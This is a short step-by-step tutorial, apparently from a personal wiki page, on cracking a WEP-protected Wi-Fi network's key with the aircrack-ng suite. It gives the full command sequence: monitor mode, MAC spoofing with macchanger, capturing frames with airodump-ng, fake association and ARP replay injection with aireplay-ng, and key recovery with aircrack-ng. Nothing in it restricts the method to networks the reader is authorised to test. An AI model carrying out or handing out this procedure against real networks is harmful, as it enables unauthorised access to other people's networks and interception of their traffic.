1. Install software
  2. Setup
  3. Enable monitoring mode
  4. Show all known networks
  5. Start dumping frames
  6. Inject packets
  7. Decode the packets
  8. Cleanup
  9. References

Install software

This tutorial uses aircrack-ng available as a Debian package or in the Backtrack live CD, known better known as Kali Linux.


We will use the following variables here:


Enable monitoring mode

This will make the device listen to all frames coming in:

airmon-ng stop $interface
ifconfig $interface down
macchanger --mac $mac $interface
airmon-ng start $interface

Show all known networks

This will display all networks as they are found. You are looking for one with WEP in the ENC column.

airodump-ng $interface

Copy-paste the line of the network you want to inspect. The BSSID, CH and ESSID fields are the important bits here.


Start dumping frames

airodump-ng -c $channel -w $essid --bssid $bssid $interface

Inject packets

In another window:

aireplay-ng -1 0 -a $bssid -h $mac -e $essid $interface

You are loking for the following message:

Association successful

Now we need to generate more packets:

aireplay-ng -3 -b $bssid -h $mac $interface

The #Data column in the airodump-ng window should start going up. Wait until it goes above 10 000. More is better.

Decode the packets

Now decode that dump file to find out the secret WEP key:

aircrack-ng -b $bssid $essid.cap

The WEP key appears next to KEY FOUND. The key has extra colons added that should be removed.


Remove the monitoring interface:

airmon-ng stop $interface
iw dev $interface del

Otherwise network-manager freaks out and fills daemon.log.


Inspired by lifehacker.com.

Created . Edited .